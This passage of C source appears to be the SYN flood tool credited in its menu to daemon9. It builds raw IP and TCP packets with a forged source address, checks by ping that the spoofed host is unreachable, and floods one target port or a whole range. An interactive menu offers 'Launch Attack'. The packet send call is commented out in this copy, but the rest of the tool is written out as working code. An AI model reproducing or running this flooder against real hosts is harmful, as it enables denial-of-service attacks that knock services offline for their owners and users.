| break; |
| case 'p': /* Target port */ |
| port=atoi(optarg); |
| break; |
| case '8': /* infinity switch */ |
| port=0; |
| break; |
| case 'a': /* Amount of SYNs to send */ |
| amount=atoi(optarg); |
| break; |
| default: /* WTF? */ |
| usage(argv[0]); |
| } |
| } |
|
|
| if(!port){ |
| printf("\n\nFlooding target: \t\t%u\nOn ports\t\t\t1-%d\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,MAXPORT,amount,unreachable); |
| flood(sock1,unreachable,target,0,amount); |
| } |
| else{ |
| printf("\n\nFlooding target: \t\t%u\nOn port: \t\t\t%u\nAmount: \t\t\t%u\nPuportedly from: \t\t%u \n",target,port,amount,unreachable); |
| flood(sock1,unreachable,target,port,amount); |
| } |
| syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),passEnt->pw_name,t,u,port,amount); |
| printf(werd); |
| exit(0); |
| } /* End main */ |
|
|
| /* |
| * Authenticate. Makes sure user is authorized to run program. |
| * |
| */ |
| int authenticate(fd,nameID) |
| int fd; |
| char *nameID; |
| { |
|
|
| char buf[BUFLEN+1]; |
| char workBuffer[10]; |
| int i=0,j=0; |
|
|
| while(read(fd,buf,sizeof(buf))){ |
| if(!(strstr(buf,nameID))){ |
| close(fd); |
| syslog(LOG_LOCAL6|LOG_INFO,"Failed authentication for %s\n",nameID); |
| return(0); |
| } |
| else { |
| close(fd); |
| syslog(LOG_LOCAL6|LOG_INFO,"Successful start by %s, PID: %d\n",nameID,getpid()); |
| return(1); |
| } |
| } |
| } |
|
|
|
|
| /* |
| * Flood. This is main workhorse of the program. IP and TCP header |
| * construction occurs here, as does flooding. |
| */ |
| void flood(int sock,unsigned sadd,unsigned dadd,u_short dport,int amount){ |
| |
| unsigned short in_cksum(unsigned short *,int); |
| |
| struct packet{ |
| struct iphdr ip; |
| struct tcphdr tcp; |
| }packet; |
| |
| struct pseudo_header{ /* For TCP header checksum */ |
| unsigned int source_address; |
| unsigned int dest_address; |
| unsigned char placeholder; |
| unsigned char protocol; |
| unsigned short tcp_length; |
| struct tcphdr tcp; |
| }pseudo_header; |
| |
| struct sockaddr_in sin; /* IP address information */ |
| register int i=0,j=0; /* Counters */ |
| int tsunami=0; /* flag */ |
| unsigned short sport=161+getpid(); |
|
|
| if(!dport){ |
| tsunami++; /* GOD save them... */ |
| fprintf(stderr,"\nTSUNAMI!\n"); |
| fprintf(stderr,"\nflooding port:"); |
| } |
|
|
| /* Setup the sin struct with addressing information */ |
|
|
| sin.sin_family=AF_INET; /* Internet address family */ |
| sin.sin_port=sport; /* Source port */ |
| sin.sin_addr.s_addr=dadd; /* Dest. address */ |
| |
| /* Packet assembly begins here */ |
|
|
| /* Fill in all the TCP header information */ |
|
|
| packet.tcp.source=sport; /* 16-bit Source port number */ |
| packet.tcp.dest=htons(dport); /* 16-bit Destination port */ |
| packet.tcp.seq=49358353+getpid(); /* 32-bit Sequence Number */ |
| packet.tcp.ack_seq=0; /* 32-bit Acknowledgement Number */ |
| packet.tcp.doff=5; /* Data offset */ |
| packet.tcp.res1=0; /* reserved */ |
| packet.tcp.res2=0; /* reserved */ |
| packet.tcp.urg=0; /* Urgent offset valid flag */ |
| packet.tcp.ack=0; /* Acknowledgement field valid flag */ |
| packet.tcp.psh=0; /* Push flag */ |
| packet.tcp.rst=0; /* Reset flag */ |
| packet.tcp.syn=1; /* Synchronize sequence numbers flag */ |
| packet.tcp.fin=0; /* Finish sending flag */ |
| packet.tcp.window=htons(242); /* 16-bit Window size */ |
| packet.tcp.check=0; /* 16-bit checksum (to be filled in below) */ |
| packet.tcp.urg_ptr=0; /* 16-bit urgent offset */ |
| |
| /* Fill in all the IP header information */ |
| |
| packet.ip.version=4; /* 4-bit Version */ |
| packet.ip.ihl=5; /* 4-bit Header Length */ |
| packet.ip.tos=0; /* 8-bit Type of service */ |
| packet.ip.tot_len=htons(40); /* 16-bit Total length */ |
| packet.ip.id=getpid(); /* 16-bit ID field */ |
| packet.ip.frag_off=0; /* 13-bit Fragment offset */ |
| packet.ip.ttl=255; /* 8-bit Time To Live */ |
| packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */ |
| packet.ip.check=0; /* 16-bit Header checksum (filled in below) */ |
| packet.ip.saddr=sadd; /* 32-bit Source Address */ |
| packet.ip.daddr=dadd; /* 32-bit Destination Address */ |
| |
| /* Psuedo-headers needed for TCP hdr checksum (they |
| do not change and do not need to be in the loop) */ |
| |
| pseudo_header.source_address=packet.ip.saddr; |
| pseudo_header.dest_address=packet.ip.daddr; |
| pseudo_header.placeholder=0; |
| pseudo_header.protocol=IPPROTO_TCP; |
| pseudo_header.tcp_length=htons(20); |
| |
| while(1){ /* Main loop */ |
| if(tsunami){ |
| if(j==MAXPORT){ |
| tsunami=0; |
| break; |
| } |
| packet.tcp.dest=htons(++j); |
| fprintf(stderr,"%d",j); |
| fprintf(stderr,"%c",0x08); |
| if(j>=10)fprintf(stderr,"%c",0x08); |
| if(j>=100)fprintf(stderr,"%c",0x08); |
| if(j>=1000)fprintf(stderr,"%c",0x08); |
| if(j>=10000)fprintf(stderr,"%c",0x08); |
|
|
| } |
| for(i=0;i<amount;i++){ /* Flood loop */ |
|
|
| /* Certian header fields should change */ |
|
|
| packet.tcp.source++; /* Source port inc */ |
| packet.tcp.seq++; /* Sequence Number inc */ |
| packet.tcp.check=0; /* Checksum will need to change */ |
| packet.ip.id++; /* ID number */ |
| packet.ip.check=0; /* Checksum will need to change */ |
| |
| /* IP header checksum */ |
| |
| packet.ip.check=in_cksum((unsigned short *)&packet.ip,20); |
| |
| /* Setup TCP headers for checksum */ |
|
|
| bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20); |
|
|
| /* TCP header checksum */ |
|
|
| packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32); |
|
|
| /* As it turns out, if we blast packets too fast, many |
| get dropped, as the receiving kernel can't cope (at |
| least on an ethernet). This value could be tweaked |
| prolly, but that's up to you for now... */ |
| |
| usleep(FLOODSLEEP); |
| |
| /* This is where we sit back and watch it all come together */ |
| |
| /*sendto(sock,&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));*/ |
| if(!tsunami&&!KEEPQUIET)fprintf(stderr,"."); |
| } |
| if(!tsunami)break; |
| } |
| } |
| |
|
|
| /* |
| * IP Family checksum routine (from UNP) |
| */ |
| unsigned short in_cksum(unsigned short *ptr,int nbytes){ |
|
|
| register long sum; /* assumes long == 32 bits */ |
| u_short oddbyte; |
| register u_short answer; /* assumes u_short == 16 bits */ |
| |
| /* |
| * Our algorithm is simple, using a 32-bit accumulator (sum), |
| * we add sequential 16-bit words to it, and at the end, fold back |
| * all the carry bits from the top 16 bits into the lower 16 bits. |
| */ |
| |
| sum = 0; |
| while (nbytes > 1) { |
| sum += *ptr++; |
| nbytes -= 2; |
| } |
| |
| /* mop up an odd byte, if necessary */ |
| if (nbytes == 1) { |
| oddbyte = 0; /* make sure top half is zero */ |
| *((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */ |
| sum += oddbyte; |
| } |
| |
| /* |
| * Add back carry outs from top 16 bits to low 16 bits. |
| */ |
| |
| sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ |
| sum += (sum >> 16); /* add carry */ |
| answer = ~sum; /* ones-complement, then truncate to 16 bits */ |
| return(answer); |
| } |
|
|
|
|
| /* |
| * Converts IP addresses |
| */ |
| unsigned nameResolve(char *hostname){ |
|
|
| struct in_addr addr; |
| struct hostent *hostEnt; |
|
|
| if((addr.s_addr=inet_addr(hostname))==-1){ |
| if(!(hostEnt=gethostbyname(hostname))){ |
| fprintf(stderr,"Name lookup failure: `%s`\n",hostname); |
| exit(0); |
| } |
| bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); |
| } |
| return addr.s_addr; |
| } |
|
|
|
|
| /* |
| * Menu function. Nothing suprising here. Except that one thing. |
| */ |
| void menu(sock1,nameID) |
| int sock1; |
| char *nameID; |
| { |
| int slickPing(int,int,char *); |
| void flood(int,unsigned,unsigned,u_short,int); |
| unsigned nameResolve(char *); |
| void demon(int,char *,char *,int,int,int,int); |
|
|
| int i,sock2,menuLoop=1,icmpAmt,port,amount,interval,ttl; |
| char optflags[7]={0}; /* So we can keep track of the options */ |
| static char tmp[MENUBUF+1]={0},target[MENUBUF+1]={0},unreach[MENUBUF+1]={0}; |
|
|
| while(menuLoop){ |
| printf("\n\n\t\t\t[ SYNflood Menu ]\n\t\t\t [ daemon9 ]\n\n"); |
| if(!optflags[0])printf("1\t\tEnter target host\n"); |
| else printf("[1]\t\tTarget:\t\t\t%s\n",target); |
| if(!optflags[1])printf("2\t\tEnter source (unreachable) host\n"); |
| else printf("[2]\t\tUnreachable:\t\t%s\n",unreach); |
| if(!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n"); |
| else printf("[3]\t\tUnreachable host:\tverified unreachable\n"); |
| if(!optflags[3])printf("4\t\tEnter port number to flood\n"); |
| else if(port)printf("[4]\t\tFlooding:\t\t%d\n",port); |
| else printf("[4]\t\tFlooding:\t\t1-1024\n"); |
| if(!optflags[4])printf("5\t\tEnter number of SYNs\n"); |
| else printf("[5]\t\tNumber SYNs:\t\t%d\n",amount); |
| printf("\n6\t\tQuit\n"); |
| if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("7\t\tLaunch Attack\n"); |
| if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("8\t\tDaemonize\n"); |
| printf("\n\n\n\n\n\n\n\n\n\n\n\n"); |
| fgets(tmp,BUFLEN/2,stdin); /* tempered input */ |
| switch(atoi(tmp)){ |
| case 1: |
| printf("[hostname]-> "); |
| fgets(target,MENUBUF,stdin); |
| i=0; |
| if(target[0]=='\n')break; |
| while(target[i]!='\n')i++; |
| target[i]=0; |
| optflags[0]=1; |
| break; |
| case 2: |
| printf("[hostname]-> "); |
| fgets(unreach,MENUBUF,stdin); |
| i=0; |
| if(unreach[0]=='\n')break; |
| while(unreach[i]!='\n')i++; |
| unreach[i]=0; |
| optflags[1]=1; |
| break; |
| case 3: |
| if(!optflags[1]){ |
| fprintf(stderr,"Um, enter a host first\n"); |
| usleep(MENUSLEEP); |
| break; |
| } |
| /* Raw ICMP socket */ |
| if((sock2=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){ |
| perror("\nHmmm.... socket problems\n"); |
| exit(1); |
| } |
| printf("[number of ICMP_ECHO's]-> "); |
| fgets(tmp,MENUBUF,stdin); |
| if(!(icmpAmt=atoi(tmp)))break; |
| if(slickPing(icmpAmt,sock2,unreach)){ |
| fprintf(stderr,"Host is reachable... Pick a new one\n"); |
| sleep(1); |
| optflags[1]=0; |
| optflags[2]=0; |
| HANDLERCODE=1; |
| close(sock2); |
| break; |
| } |
| optflags[2]=1; |
| close(sock2); |
| break; |
| case 4: |
| printf("[port number]-> "); |
| fgets(tmp,MENUBUF,stdin); |
| port=atoi(tmp); |
| optflags[3]=1; |
| break; |
| case 5: |
| printf("[number of SYNs]-> "); |
| fgets(tmp,MENUBUF,stdin); |
| if(!(amount=atoi(tmp)))break; |
| optflags[4]=1; |
| break; |
| case 6: |
| menuLoop--; |
| break; |
| case 7: |
| if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){ |
| syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach,port,amount); |
| flood(sock1,nameResolve(unreach),nameResolve(target),port,amount); |
| menuLoop--; |
| } |
| else{ |
| fprintf(stderr,"Illegal option --try again\n"); |
| usleep(MENUSLEEP); |
| } |
| break; |
| case 8: |
| if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){ |
| if(!port){ |
| fprintf(stderr,"Cannot set infinity flag in daemon mode. Sorry.\n"); |
| usleep(MENUSLEEP*2); |
| break; |
| } |
| printf("[packet sending interval in seconds {80}]-> "); |
| fgets(tmp,MENUBUF,stdin); |
| if(!(interval=atoi(tmp)))interval=80; |
| printf("[time for daemon to live in whole hours(0=forever)]-> "); |
| fgets(tmp,MENUBUF,stdin); |
| ttl=atoi(tmp); |
| syslog(LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n",getpid(),nameID,target,unreach,port,amount,interval,ttl); |
| demon(sock1,unreach,target,port,amount,interval,ttl); |
| exit(0); |
| } |
| else{ |
| fprintf(stderr,"Illegal option --try again\n"); |
| usleep(MENUSLEEP); |
| } |
| break; |
| |
| default: |
| fprintf(stderr,"Illegal option --try again\n"); |
| usleep(MENUSLEEP); |
| } |
|
|
| } |
| printf("\n"); |
| printf(werd); |
| return; |
| } |
|
|
|
|
| /* |
| * SlickPing. A quick and dirty ping hack. Sends <amount> ICMP_ECHO |
| * packets and waits for a reply on any one of them... It has to check |
| * to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP |
| * sockets get ALL the ICMP traffic on a host, and someone could be |
| * pinging some other host and we could get that ECHOREPLY and foul |
| * things up for us. |
| */ |
| int slickPing(amount,sock,dest) |
| int amount,sock; |
| char *dest; |
| { |
|
|
| int alarmHandler(); |
| unsigned nameResolve(char *); |
| |
| register int retcode,j=0; |
| struct icmphdr *icmp; |
| struct sockaddr_in sin; |
| unsigned char sendICMPpak[MAXPAK]={0}; |
| unsigned short pakID=getpid()&0xffff; |
|
|
| struct ippkt{ |
| struct iphdr ip; |
| struct icmphdr icmp; |
| char buffer[MAXPAK]; |
| }pkt; |
|
|
| bzero((char *)&sin,sizeof(sin)); |
| sin.sin_family=AF_INET; |
| sin.sin_addr.s_addr=nameResolve(dest); |
|
|
| /* ICMP Packet assembly */ |
| /* We let the kernel create our IP header as it is legit */ |
|
|
| icmp=(struct icmphdr *)sendICMPpak; |
| icmp->type=ICMP_ECHO; /* Requesting an Echo */ |
| icmp->code=0; /* 0 for ICMP ECHO/ECHO_REPLY */ |
| icmp->un.echo.id=pakID; /* To identify upon return */ |
| icmp->un.echo.sequence=0; /* Not used for us */ |
| icmp->checksum=in_cksum((unsigned short *)icmp,64); |
|
|
| fprintf(stderr,"sending ICMP_ECHO packets: "); |
| for(;j<amount;j++){ |
| usleep(ICMPSLEEP); /* For good measure */ |
| retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin)); |
| if(retcode<0||retcode!=64) |
| if(retcode<0){ |
| perror("ICMP sendto err"); |
| exit(1); |
| } |
| else fprintf(stderr,"Only wrote %d bytes",retcode); |
| else fprintf(stderr,"."); |
| } |
| HANDLERCODE=1; |
| signal(SIGALRM,alarmHandler); /* catch the ALARM and handle it */ |
| fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n"); |
| alarm(10); /* ALARM is set b/c read() will block forever if no */ |
| while(1){ /* packets arrive... (which is what we want....) */ |
| read(sock,(struct ippkt *)&pkt,MAXPAK-1); |
| if(pkt.icmp.type==ICMP_ECHOREPLY&&icmp->un.echo.id==pakID){ |
| if(!HANDLERCODE)return(0); |
| return(1); |
| } |
| } |
| } |
|
|
|
|
| /* |
| * SIGALRM signal handler. Souper simple. |
| */ |
| int alarmHandler(){ |
|
|
| HANDLERCODE=0; /* shame on me for using global vars */ |
| alarm(0); |
| signal(SIGALRM,SIG_DFL); |
| return(0); |
| } |
|
|
|
|
| /* |
| * Usage function... |
| */ |
| void usage(nomenclature) |
| char *nomenclature; |
| { |
| fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature); |
| exit(0); |
| } |
|
|
|
|
| /* |
| * Demon. Backgrounding procedure and looping stuff. |
| */ |
|
|
| void demon(sock,unreachable,target,port,amount,interval,ttl) |
| int sock; |
| char *unreachable; |
| char *target; |
| int port; |
| int amount; |
| int interval; |
| int ttl; |
| { |
| fprintf(stderr,"\nSorry Daemon mode not available in this version\n"); |
| exit(0); |
|
|
| } |
| |
|
|